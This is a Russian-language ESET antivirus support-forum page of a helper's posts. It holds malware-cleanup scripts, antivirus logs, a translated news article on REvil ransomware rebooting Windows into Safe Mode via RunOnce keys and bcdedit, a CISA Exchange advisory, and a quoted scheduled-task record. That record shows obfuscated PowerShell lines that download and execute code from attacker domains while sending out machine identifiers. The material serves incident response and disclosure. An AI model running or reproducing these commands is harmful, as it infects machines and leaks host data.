santy (Все сообщения пользователя) - Форум технической поддержки ESET NOD32

[ Закрыто] MSIL/Injector.VGR, каждые 30 секунд

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 25.03.2021 17:24:08

выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"

Код
;uVS v4.11.6 [http://dsrt.dyndns.org:8888] ;Target OS: NTv10.0 v400c OFFSGNSAVE ;------------------------autoscript--------------------------- zoo %SystemDrive%\USERS\ASUS\APPDATA\ROAMING\MICROSOFT\GOOGLE\CHROMEEXTENSIONS\ADS\HONEYADS\EXUPD.EXE addsgn 0DC97ABF556A80BEC718627DA804DEC9E9EC9AF9967E1F7885C3C543B0962404A0FBE31FB5BFD5C22AC80F4ECD1EA1CF802017E21D59740C70B4686F924EA999 8 Trojan:Win32/Bomitag.D!ml [Microsoft] 7 chklst delvir delref %SystemDrive%\USERS\ASUS\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\FFDSIYFJ.DEFAULT-1572023545566\FEATURES\{4D217842-9BCE-467C-9E32-E71A4577FA46}\[email protected] apply deltmp delref %Sys32%\DRIVERSTORE\FILEREPOSITORY\NVAMI.INF_AMD64_59AE0FEAB7458406\DISPLAY.NVCONTAINER\NVDISPLAY.CONTAINER.EXE -S NVDISPLAY.CONTAINERLOCALSYSTEM -F C:\PROGRAMDATA\NVIDIA\NVDISPLAY.CONTAINERLOCALSYSTEM.LOG -L 3 -D C:\WINDOWS\SYSTEM32\DRIVERSTORE\FILEREPOSITORY\NVAMI.INF_AMD64_59AE0FEAB7458406\DISPLAY.NVCONTAINER\PLUGINS\LOCALSYSTEM -R -P 30000 -CFG NVDISPLAY.CONTAINERLOCALSYSTEM\LOCALSYSTEM delref %SystemDrive%\USERS\ASUS\APPDATA\LOCAL\TEMP\EDGE_BITS_9000_343374450\A04F9D18-B852-4181-97B7-6D0D8D0FDCC0 delref %SystemDrive%\USERS\ASUS\APPDATA\LOCAL\TEMP\CHROME_BITS_9952_1545405988\AKCBQLETN1E8LQ8RYG_IHAS delref {D27CDB6E-AE6D-11CF-96B8-444553540000}\[CLSID] delref %SystemRoot%\SYSWOW64\BLANK.HTM delref %Sys32%\BLANK.HTM delref %Sys32%\DRIVERSTORE\FILEREPOSITORY\NVAMI.INF_AMD64_59AE0FEAB7458406\DISPLAY.NVCONTAINER\NVDISPLAY.CONTAINER.EXE -S NVDISPLAY.CONTAINERLOCALSYSTEM -F %PROGRAMDATA%\NVIDIA\NVDISPLAY.CONTAINERLOCALSYSTEM.LOG -L 3 -D C:\WINDOWS\SYSTEM32\DRIVERSTORE\FILEREPOSITORY\NVAMI.INF_AMD64_59AE0FEAB7458406\DISPLAY.NVCONTAINER\PLUGINS\LOCALSYSTEM -R -P 30000 -CFG NVDISPLAY.CONTAINERLOCALSYSTEM\LOCALSYSTEM delref %Sys32%\DRIVERS\PORTTALK.SYS delref %SystemDrive%\USERS\ASUS\APPDATA\LOCAL\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected] delref %SystemDrive%\USERS\ASUS\APPDATA\LOCAL\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected] delref %SystemDrive%\USERS\ASUS\APPDATA\LOCAL\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected] delref %SystemDrive%\USERS\ASUS\APPDATA\LOCAL\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected] delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.36.52\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.139.59\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.139.65\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.141.59\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.139.71\PSMACHINE_64.DLL delref %SystemRoot%\SYSWOW64\SPEECH_ONECORE\COMMON\SPEECHRUNTIME.EXE delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\NVAMI.INF_AMD64_59AE0FEAB7458406\NVENCMFTH264.DLL delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\NVAMI.INF_AMD64_59AE0FEAB7458406\NVDECMFTMJPEG.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.36.52\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.139.59\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.139.65\PSMACHINE.DLL delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\NVAMI.INF_AMD64_59AE0FEAB7458406\NVENCMFTHEVC.DLL delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.141.59\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.139.71\PSMACHINE.DLL ;------------------------------------------------------------- restart

Код


;uVS v4.11.6 [http://dsrt.dyndns.org:8888]
;Target OS: NTv10.0
v400c
OFFSGNSAVE
;------------------------autoscript---------------------------

zoo %SystemDrive%\USERS\ASUS\APPDATA\ROAMING\MICROSOFT\GOOGLE\CHROMEEXTENSIONS\ADS\HONEYADS\EXUPD.EXE
addsgn 0DC97ABF556A80BEC718627DA804DEC9E9EC9AF9967E1F7885C3C543B0962404A0FBE31FB5BFD5C22AC80F4ECD1EA1CF802017E21D59740C70B4686F924EA999 8 Trojan:Win32/Bomitag.D!ml [Microsoft] 7

chklst
delvir

delref %SystemDrive%\USERS\ASUS\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\FFDSIYFJ.DEFAULT-1572023545566\FEATURES\{4D217842-9BCE-467C-9E32-E71A4577FA46}\[email protected]
apply

deltmp
delref %Sys32%\DRIVERSTORE\FILEREPOSITORY\NVAMI.INF_AMD64_59AE0FEAB7458406\DISPLAY.NVCONTAINER\NVDISPLAY.CONTAINER.EXE -S NVDISPLAY.CONTAINERLOCALSYSTEM -F C:\PROGRAMDATA\NVIDIA\NVDISPLAY.CONTAINERLOCALSYSTEM.LOG -L 3 -D C:\WINDOWS\SYSTEM32\DRIVERSTORE\FILEREPOSITORY\NVAMI.INF_AMD64_59AE0FEAB7458406\DISPLAY.NVCONTAINER\PLUGINS\LOCALSYSTEM -R -P 30000 -CFG NVDISPLAY.CONTAINERLOCALSYSTEM\LOCALSYSTEM
delref %SystemDrive%\USERS\ASUS\APPDATA\LOCAL\TEMP\EDGE_BITS_9000_343374450\A04F9D18-B852-4181-97B7-6D0D8D0FDCC0
delref %SystemDrive%\USERS\ASUS\APPDATA\LOCAL\TEMP\CHROME_BITS_9952_1545405988\AKCBQLETN1E8LQ8RYG_IHAS
delref {D27CDB6E-AE6D-11CF-96B8-444553540000}\[CLSID]
delref %SystemRoot%\SYSWOW64\BLANK.HTM
delref %Sys32%\BLANK.HTM
delref %Sys32%\DRIVERSTORE\FILEREPOSITORY\NVAMI.INF_AMD64_59AE0FEAB7458406\DISPLAY.NVCONTAINER\NVDISPLAY.CONTAINER.EXE -S NVDISPLAY.CONTAINERLOCALSYSTEM -F %PROGRAMDATA%\NVIDIA\NVDISPLAY.CONTAINERLOCALSYSTEM.LOG -L 3 -D C:\WINDOWS\SYSTEM32\DRIVERSTORE\FILEREPOSITORY\NVAMI.INF_AMD64_59AE0FEAB7458406\DISPLAY.NVCONTAINER\PLUGINS\LOCALSYSTEM -R -P 30000 -CFG NVDISPLAY.CONTAINERLOCALSYSTEM\LOCALSYSTEM
delref %Sys32%\DRIVERS\PORTTALK.SYS
delref %SystemDrive%\USERS\ASUS\APPDATA\LOCAL\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected]
delref %SystemDrive%\USERS\ASUS\APPDATA\LOCAL\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected]
delref %SystemDrive%\USERS\ASUS\APPDATA\LOCAL\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected]
delref %SystemDrive%\USERS\ASUS\APPDATA\LOCAL\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected]
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.36.52\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.139.59\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.139.65\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.141.59\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.139.71\PSMACHINE_64.DLL
delref %SystemRoot%\SYSWOW64\SPEECH_ONECORE\COMMON\SPEECHRUNTIME.EXE
delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\NVAMI.INF_AMD64_59AE0FEAB7458406\NVENCMFTH264.DLL
delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\NVAMI.INF_AMD64_59AE0FEAB7458406\NVDECMFTMJPEG.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.36.52\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.139.59\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.139.65\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\NVAMI.INF_AMD64_59AE0FEAB7458406\NVENCMFTHEVC.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.141.59\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.139.71\PSMACHINE.DLL
;-------------------------------------------------------------

restart

перезагрузка, пишем о старых и новых проблемах.
------------
далее,
сделайте дополнительно быструю проверку системы в малваребайт
http://forum.esetnod32.ru/forum9/topic10688/

[ Как создать образ автозапуска? ]

Перейти

[ Закрыто] MSIL/Injector.VGR, каждые 30 секунд

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 25.03.2021 17:19:47

приложите образ автозапуска к вашему сообщению, раз есть такая возможность

[ Как создать образ автозапуска? ]

Перейти

REvil Ransomware использует новый режим шифрования из Windows Safe Mode

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 24.03.2021 15:10:59

REvil добавил новую возможность шифрования файлов в безопасном режиме Windows, что позволяет избежать обнаружения программным обеспечением безопасности и добиться большего успеха при шифровании файлов.

Безопасный режим Windows - это специальный режим запуска, который позволяет пользователям запускать административные и диагностические задачи в операционной системе. В этом режиме загружается только самый минимум программного обеспечения и драйверов, необходимых для работы операционной системы.

Более того, любые установленные в Windows программы, которые настроены на автоматический запуск, не будут запускаться в безопасном режиме, если их автозапуск не настроен определенным образом.

Один из способов создать автозапуск в Windows - создать записи в следующих разделах реестра:

Цитата
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce

Ключи «Run» запускают программу каждый раз, когда вы входите в систему, а ключи «RunOnce» запускает программу только один раз, а затем удаляет запись из реестра.

Например, следующий ключ реестра автоматически запустит программу C:\Users\test\test.exe при входе в Windows.

Цитата
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "Startup"="C:\Users\test\test.exe"

Однако указанный выше автозапуск не запустится в безопасном режиме, если вы не добавите звездочку (*) в начало имени значения, как показано ниже:

Цитата
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "* Startup" = "C:\Users\test\test.exe"

REvil теперь включает режим 'Safe Mode'

В новом образце вымогателя REvil, обнаруженном MalwareHunterTeam, был добавлен новый аргумент командной строки -smode, который заставляет компьютер перезагружаться в безопасном режиме перед шифрованием устройства.

Для этого REvil выполнит следующие команды, чтобы компьютер загрузился в безопасном режиме с загрузкой сетевых драйверов при следующей перезагрузке Windows.

Цитата
bootcfg /raw /a /safeboot:network /id 1 bcdedit /set {current} safeboot network

Затем он создает автозапуск «RunOnce» под названием «* franceisshit», который выполняет «bcdedit / deletevalue {current} safeboot» после того, как пользователь войдет в безопасный режим.

Наконец, программа-вымогатель выполняет принудительный перезапуск Windows, который не может быть прерван пользователем.

Непосредственно перед завершением процесса он создаст дополнительный автозапуск RunOnce под названием «AstraZeneca», возможно, в связи с недавними обсуждениями во Франции использования вакцины.

Этот автозапуск перезапустит программу-вымогатель REvil без аргумента -smode, когда следующий пользователь войдет в систему после перезагрузки устройства.

Важно помнить, что обе эти записи RunOnce будут выполнены после входа в безопасный режим и будут автоматически удалены Windows.

После перезагрузки устройство запустится в безопасном режиме с загрузкой сетевых драйверов, и пользователю будет предложено войти в Windows. После входа в систему программа-вымогатель REvil будет запущена без аргумента -smode, чтобы начать шифрование файлов на устройстве.

Windows также запустит команду «bcdedit / deletevalue {current} safeboot», настроенную ключом реестра «* AstraZeneca», чтобы компьютер мог перезагрузиться в нормальный режим после завершения работы программы-вымогателя.

Пока REvil шифрует файлы, экран безопасного режима будет пустым, но по-прежнему можно использовать Ctrl + Alt + Delete для запуска диспетчера задач Windows. Оттуда вы можете увидеть запущенный исполняемый файл, который в нашем тесте называется «smode.exe», как показано ниже.

Во время работы программа-вымогатель не позволяет пользователям запускать какие-либо программы через диспетчер задач, пока не завершит шифрование устройства.

После того, как устройство будет зашифровано, будет продолжена остальная часть последовательности загрузки, а рабочий стол будет показан с запиской о выкупе и зашифрованными файлами.

Необычный подход

Новая операция REvil в безопасном режиме немного странная, поскольку требует от пользователей входа в систему после перезапуска в безопасном режиме.

Кроме того, как только они войдут в безопасный режим, они будут представлены с пустым экраном и загрузкой дисков, поскольку программа-вымогатель шифрует устройство.

Такое поведение может привести к тому, что пользователи могут перейти в спящий режим или выключат свои компьютеры в целях безопасности.

По этой причине возможно, что злоумышленники вручную запускают новую команду безопасного режима на определенных компьютерах, таких как виртуальные машины или серверы, которые они хотят зашифровать без проблем.

Независимо от причин, это еще один новый метод атаки, на который следует обратить внимание специалистам по безопасности и администраторам Windows, поскольку группы вымогателей постоянно меняют свою тактику.

REvil - не единственная операция, использующая безопасный режим для шифрования устройств.

В 2019 году еще одна программа-вымогатель, известная как Snatch, также добавила возможность шифровать устройство в безопасном режиме с помощью службы Windows.

https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/

[ Как создать образ автозапуска? ]

Перейти

MSIL/Injector.VGR

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 24.03.2021 13:32:11

да, все найденное в малваребайт удалить,
далее

3.сделайте проверку в АдвКлинере
http://forum.esetnod32.ru/forum9/topic7084/

*****
4.в АдвКлинере, после завершения проверки,
в секции Папки снимите галки с записей mail.ru, yandex (если есть такие)
остальное удалите по кнопке Очистить
далее,

5.сделайте проверку в FRST
http://forum.esetnod32.ru/forum9/topic2798/

[ Как создать образ автозапуска? ]

Перейти

MSIL/Injector.VGR

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 24.03.2021 11:37:27

Код
;uVS v4.11.6 [http://dsrt.dyndns.org:8888] ;Target OS: NTv6.1 v400c OFFSGNSAVE hide %Sys32%\RPCSS.DLL ;------------------------autoscript--------------------------- del %SystemDrive%\USERS\ОЛЕГ\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\MICROSOFT NET_FRAMEWORK.BAT zoo %SystemDrive%\USERS\ОЛЕГ\APPDATA\ROAMING\MICROSOFT\GOOGLE\CHROMEEXTENSIONS\ADS\HONEYADS\EXUPD.EXE addsgn 0DC97ABF556A80BEC718627DA804DEC9E9EC9AF9967E1F7885C3C543B0962404A0FBE31FB5BFD5C22AC80F4ECD1EA1CF802017E21D59740C70B4686F924EA999 8 Trojan:Win32/Bomitag.D!ml [Microsoft] 7 chklst delvir delref HTTP://CAT.WARGAMING.NET delref %SystemDrive%\USERS\ОЛЕГ\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\MICROSOFT NET_FRAMEWORK.BAT apply ; OpenAL exec C:\Program Files (x86)\OpenAL\OpenAL.exe" /U deltmp delref {D27CDB6E-AE6D-11CF-96B8-444553540000}\[CLSID] delref %SystemRoot%\SYSWOW64\BLANK.HTM delref %Sys32%\BLANK.HTM delref %Sys32%\PSXSS.EXE delref %SystemDrive%\PROGRAM FILES (X86)\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected] delref %SystemDrive%\PROGRAM FILES (X86)\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected] delref %SystemDrive%\PROGRAM FILES (X86)\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected] delref %SystemDrive%\PROGRAM FILES (X86)\MOZILLA FIREFOX\BROWSER\EXTENSIONS\{972CE4C6-7E08-4474-A285-3208198CE6FD}.XPI ;------------------------------------------------------------- restart

Код


;uVS v4.11.6 [http://dsrt.dyndns.org:8888]
;Target OS: NTv6.1
v400c
OFFSGNSAVE
hide %Sys32%\RPCSS.DLL
;------------------------autoscript---------------------------

del %SystemDrive%\USERS\ОЛЕГ\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\MICROSOFT NET_FRAMEWORK.BAT
zoo %SystemDrive%\USERS\ОЛЕГ\APPDATA\ROAMING\MICROSOFT\GOOGLE\CHROMEEXTENSIONS\ADS\HONEYADS\EXUPD.EXE
addsgn 0DC97ABF556A80BEC718627DA804DEC9E9EC9AF9967E1F7885C3C543B0962404A0FBE31FB5BFD5C22AC80F4ECD1EA1CF802017E21D59740C70B4686F924EA999 8 Trojan:Win32/Bomitag.D!ml [Microsoft] 7

chklst
delvir

delref HTTP://CAT.WARGAMING.NET
delref %SystemDrive%\USERS\ОЛЕГ\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\MICROSOFT NET_FRAMEWORK.BAT
apply

; OpenAL
exec  C:\Program Files (x86)\OpenAL\OpenAL.exe" /U

deltmp
delref {D27CDB6E-AE6D-11CF-96B8-444553540000}\[CLSID]
delref %SystemRoot%\SYSWOW64\BLANK.HTM
delref %Sys32%\BLANK.HTM
delref %Sys32%\PSXSS.EXE
delref %SystemDrive%\PROGRAM FILES (X86)\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected]
delref %SystemDrive%\PROGRAM FILES (X86)\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected]
delref %SystemDrive%\PROGRAM FILES (X86)\MOZILLA FIREFOX\BROWSER\FEATURES\[email protected]
delref %SystemDrive%\PROGRAM FILES (X86)\MOZILLA FIREFOX\BROWSER\EXTENSIONS\{972CE4C6-7E08-4474-A285-3208198CE6FD}.XPI
;-------------------------------------------------------------

restart

[ Как создать образ автозапуска? ]

Перейти

MSIL/Injector.VGR

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 24.03.2021 11:28:21

судя по логам журнала, последние события у вас наблюдались

Цитата
24.12.2020 15:32:39;Расширенный модуль сканирования памяти;файл;Оперативная память = rundll32.exe(3540);модифицированный MSIL/CoinMiner.BGJ троянская программа;содержит зараженные файлы (после следующего перезапуска);;;7BECE19F11BEFBC204657F295AC32F39075DB34A; 24.12.2020 15:34:04;Модуль сканирования файлов, исполняемых при запуске системы;файл;Оперативная память = rundll32.exe(3540);модифицированный MSIL/CoinMiner.BGJ троянская программа;содержит зараженные файлы (после следующего перезапуска);;;7BECE19F11BEFBC204657F295AC32F39075DB34A; 24.12.2020 15:39:08;Расширенный модуль сканирования памяти;файл;Оперативная память = rundll32.exe(4812);модифицированный MSIL/CoinMiner.BGJ троянская программа;содержит зараженные файлы (после следующего перезапуска);;;7BECE19F11BEFBC204657F295AC32F39075DB34A;

Цитата

24.12.2020 15:32:39;Расширенный модуль сканирования памяти;файл;Оперативная память = rundll32.exe(3540);модифицированный MSIL/CoinMiner.BGJ троянская программа;содержит зараженные файлы (после следующего перезапуска);;;7BECE19F11BEFBC204657F295AC32F39075DB34A;
24.12.2020 15:34:04;Модуль сканирования файлов, исполняемых при запуске системы;файл;Оперативная память = rundll32.exe(3540);модифицированный MSIL/CoinMiner.BGJ троянская программа;содержит зараженные файлы (после следующего перезапуска);;;7BECE19F11BEFBC204657F295AC32F39075DB34A;
24.12.2020 15:39:08;Расширенный модуль сканирования памяти;файл;Оперативная память = rundll32.exe(4812);модифицированный MSIL/CoinMiner.BGJ троянская программа;содержит зараженные файлы (после следующего перезапуска);;;7BECE19F11BEFBC204657F295AC32F39075DB34A;

угу, вижу:
23.03.2021 15:37:51;Расширенный модуль сканирования памяти;файл;Оперативная память = exUpd.exe(2204);модифицированный MSIL/Injector.VGR троянская программа;содержит зараженные файлы;;;9BCE67EAE49F031BC560EC58694290353F55F8AF;

[ Как создать образ автозапуска? ]

Перейти

поговорить о uVS, Carberp, планете Земля

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 21.03.2021 15:42:33

Цитата
RP55 RP55 написал: Наверное одно из первых применений: regt 39 https://www.cyberforum.ru/viruses/thread2798382.html

первое применение отслеживания процессов здесь:
https://www.cyberforum.ru/post15308023.html
пока еще вместо regt39 - диалог для применения настроек отслеживания в gpedit (который оперативно добавил Sandor) ,
и экспорт журнала для анализа событий через скрипт Vvvyg
только после этого был создан твик 39, и автоматический анализ событий через uVS

название тем может быть примерно таким:

1. Процесс find.exe грузит процессор на ?%
2. TCP/IP services application нагружает ЦП на ?%
3. Процесс find.exe ест много памяти и .т.п
4. Помогите удалить Trojan.Win64.Miner.gen и т.п
5. путь С:\ProgramData\Flock\Flock.exe

[ Как создать образ автозапуска? ]

Перейти

[ Закрыто] запуск майнера на серверах с MS Exchange 2013, ProxyLogon

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 18.03.2021 16:49:17

Устранение уязвимостей Microsoft Exchange Server

Цитата
Партнеры по кибербезопасности и безопасности инфраструктуры (CISA) наблюдали активное использование уязвимостей в продуктах Microsoft Exchange Server. Успешное использование этих уязвимостей позволяет злоумышленнику, не прошедшему проверку подлинности, выполнить произвольный код на уязвимых серверах Exchange Server, что позволяет злоумышленнику получить постоянный доступ к системе, а также доступ к файлам и почтовым ящикам на сервере и учетным данным, хранящимся в этой системе. Успешная эксплуатация может дополнительно позволить злоумышленнику нарушить доверие и идентификацию в уязвимой сети. Microsoft выпустила внеполосные патчи для устранения уязвимостей в Microsoft Exchange Server. Уязвимости влияют на локальные серверы Microsoft Exchange и, как известно, не влияют на облачные почтовые службы Exchange Online или Microsoft 365 (ранее O365). Это предупреждение включает в себя как тактику, методы и процедуры (TTP), так и индикаторы компрометации (IOC), связанные с этой злонамеренной деятельностью. Чтобы обезопасить себя от этой угрозы, CISA рекомендует организациям проверять свои системы на предмет наличия TTP и использовать IOC для обнаружения любых вредоносных действий. Если организация обнаруживает действия по эксплуатации, она должна предположить компрометацию сетевой идентичности и следовать процедурам реагирования на инциденты. Если организация не обнаруживает активности, она должна немедленно применить доступные исправления и реализовать меры по снижению риска, указанные в этом предупреждении.

Цитата

Партнеры по кибербезопасности и безопасности инфраструктуры (CISA) наблюдали активное использование уязвимостей в продуктах Microsoft Exchange Server. Успешное использование этих уязвимостей позволяет злоумышленнику, не прошедшему проверку подлинности, выполнить произвольный код на уязвимых серверах Exchange Server, что позволяет злоумышленнику получить постоянный доступ к системе, а также доступ к файлам и почтовым ящикам на сервере и учетным данным, хранящимся в этой системе. Успешная эксплуатация может дополнительно позволить злоумышленнику нарушить доверие и идентификацию в уязвимой сети. Microsoft выпустила внеполосные патчи для устранения уязвимостей в Microsoft Exchange Server. Уязвимости влияют на локальные серверы Microsoft Exchange и, как известно, не влияют на облачные почтовые службы Exchange Online или Microsoft 365 (ранее O365).

Это предупреждение включает в себя как тактику, методы и процедуры (TTP), так и индикаторы компрометации (IOC), связанные с этой злонамеренной деятельностью. Чтобы обезопасить себя от этой угрозы, CISA рекомендует организациям проверять свои системы на предмет наличия TTP и использовать IOC для обнаружения любых вредоносных действий. Если организация обнаруживает действия по эксплуатации, она должна предположить компрометацию сетевой идентичности и следовать процедурам реагирования на инциденты. Если организация не обнаруживает активности, она должна немедленно применить доступные исправления и реализовать меры по снижению риска, указанные в этом предупреждении.

подробнее здесь:
https://us-cert.cisa.gov/ncas/alerts/aa21-062a

[ Как создать образ автозапуска? ]

Перейти

[ Закрыто] запуск майнера на серверах с MS Exchange 2013, ProxyLogon

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 18.03.2021 07:27:19

задачи, которые были запущены через powershell(Имя компьютера: SPHVMAIL01), проверьте так же наличие новых учетных записей в домене.

Цитата
Полное имя C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE Имя файла POWERSHELL.EXE Цифр. подпись Действительна, подписано Microsoft Windows Оригинальное имя PowerShell.EXE.MUI Версия файла 6.3.9600.17396 (winblue_r4.141007-2030) Описание Windows PowerShell Производитель Microsoft Corporation Доп. информация на момент обновления списка CmdLine -W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'')))) CmdLine -C (NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'')) CmdLine -C (NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'')) CmdLine -W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.SQL'+'NETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'')))) CmdLine -C (NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'')) CmdLine -W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'')))) SHA1 9F1E24917EF96BBB339F4E2A226ACAFD1009F47B MD5 C031E215B8B08C752BF362F6D4C5D3AD Ссылки на объект Ссылка C:\WINDOWS\SYSTEM32\TASKS\A5TORJ3ZT Ссылка C:\WINDOWS\SYSTEM32\TASKS\AVCZOHW Ссылка C:\WINDOWS\SYSTEM32\TASKS\JCA9PD Ссылка C:\WINDOWS\SYSTEM32\TASKS\Microsoft\Windows\eUuwdKQkPqT\SMYVSZY4OWX Ссылка C:\WINDOWS\SYSTEM32\TASKS\O6YM9I Ссылка C:\WINDOWS\SYSTEM32\TASKS\Xnqm40cRo\ZUPKUTWN

Цитата

Полное имя C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
Имя файла POWERSHELL.EXE

Цифр. подпись Действительна, подписано Microsoft Windows

Оригинальное имя PowerShell.EXE.MUI
Версия файла 6.3.9600.17396 (winblue_r4.141007-2030)
Описание Windows PowerShell
Производитель Microsoft Corporation

Доп. информация на момент обновления списка
CmdLine -W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))))
